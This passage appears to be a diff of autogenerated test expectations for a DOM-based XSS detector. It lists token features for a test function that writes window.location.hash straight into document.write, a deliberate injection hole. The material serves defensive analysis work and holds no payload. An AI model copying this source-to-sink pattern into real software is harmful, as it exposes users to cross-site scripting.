element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:419:7:419:55 | match = ... (\\w+)/) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:419:7:419:55 | match = ... (\\w+)/) | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:419:7:419:55 | match = ... (\\w+)/) | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:419:7:419:55 | match = ... (\\w+)/) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:20 | window | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:20 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:20 | window | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:20 | window | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:20 | window | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:29 | window.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:29 | window.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:29 | window.location | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:29 | window.location | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:29 | window.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:34 | window.location.hash | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:34 | window.location.hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:34 | window.location.hash | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:34 | window.location.hash | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:34 | window.location.hash | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:40 | window. ... h.match | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:40 | window. ... h.match | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:40 | window. ... h.match | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:40 | window. ... h.match | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:40 | window. ... h.match | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:55 | exceptional return of window. ... (\\w+)/) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:55 | exceptional return of window. ... (\\w+)/) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:55 | exceptional return of window. ... (\\w+)/) | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:55 | exceptional return of window. ... (\\w+)/) | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:55 | exceptional return of window. ... (\\w+)/) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:55 | window. ... (\\w+)/) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:55 | window. ... (\\w+)/) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:55 | window. ... (\\w+)/) | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:55 | window. ... (\\w+)/) | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:419:15:419:55 | window. ... (\\w+)/) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:419:22:419:29 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:419:22:419:29 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:419:22:419:29 | location | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:419:22:419:29 | location | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:419:22:419:29 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:419:31:419:34 | hash | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:419:31:419:34 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:419:31:419:34 | hash | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:419:31:419:34 | hash | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:419:31:419:34 | hash | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:419:36:419:40 | match | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:419:36:419:40 | match | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:419:36:419:40 | match | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:419:36:419:40 | match | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:419:36:419:40 | match | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:419:42:419:54 | /hello (\\w+)/ | CalleeFlexibleAccessPath | window.location.hash.match | | autogenerated/Xss/DomBasedXss/tst.js:419:42:419:54 | /hello (\\w+)/ | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:419:42:419:54 | /hello (\\w+)/ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17542,6 +122035,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:419:42:419:54 | /hello (\\w+)/ | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | | autogenerated/Xss/DomBasedXss/tst.js:419:42:419:54 | /hello (\\w+)/ | enclosingFunctionName | hash2 | | autogenerated/Xss/DomBasedXss/tst.js:419:42:419:54 | /hello (\\w+)/ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:420:7:420:11 | match | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:420:7:420:11 | match | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:420:7:420:11 | match | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:420:7:420:11 | match | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:420:7:420:11 | match | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:420:7:420:11 | match | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:420:7:420:11 | match | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:420:7:420:11 | match | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:420:7:420:11 | match | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:420:7:420:11 | match | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:421:5:421:12 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:421:5:421:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:421:5:421:12 | document | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:421:5:421:12 | document | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:421:5:421:12 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:421:5:421:18 | document.write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:421:5:421:18 | document.write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:421:5:421:18 | document.write | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:421:5:421:18 | document.write | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:421:5:421:18 | document.write | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:421:5:421:28 | documen ... tch[1]) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:421:5:421:28 | documen ... tch[1]) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:421:5:421:28 | documen ... tch[1]) | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:421:5:421:28 | documen ... tch[1]) | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:421:5:421:28 | documen ... tch[1]) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:421:5:421:28 | exceptional return of documen ... tch[1]) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:421:5:421:28 | exceptional return of documen ... tch[1]) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:421:5:421:28 | exceptional return of documen ... tch[1]) | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:421:5:421:28 | exceptional return of documen ... tch[1]) | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:421:5:421:28 | exceptional return of documen ... tch[1]) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:421:14:421:18 | write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:421:14:421:18 | write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:421:14:421:18 | write | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:421:14:421:18 | write | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:421:14:421:18 | write | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:421:20:421:24 | match | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:421:20:421:24 | match | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:421:20:421:24 | match | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:421:20:421:24 | match | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:421:20:421:24 | match | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:421:20:421:27 | match[1] | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/tst.js:421:20:421:27 | match[1] | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:421:20:421:27 | match[1] | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17550,6 +122083,66 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:421:20:421:27 | match[1] | enclosingFunctionName | hash2 | | autogenerated/Xss/DomBasedXss/tst.js:421:20:421:27 | match[1] | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:421:20:421:27 | match[1] | receiverName | document | +| autogenerated/Xss/DomBasedXss/tst.js:421:26:421:26 | 1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:421:26:421:26 | 1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:421:26:421:26 | 1 | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:421:26:421:26 | 1 | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:421:26:421:26 | 1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:424:3:424:10 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:424:3:424:10 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:424:3:424:10 | document | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:424:3:424:10 | document | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:424:3:424:10 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:424:3:424:16 | document.write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 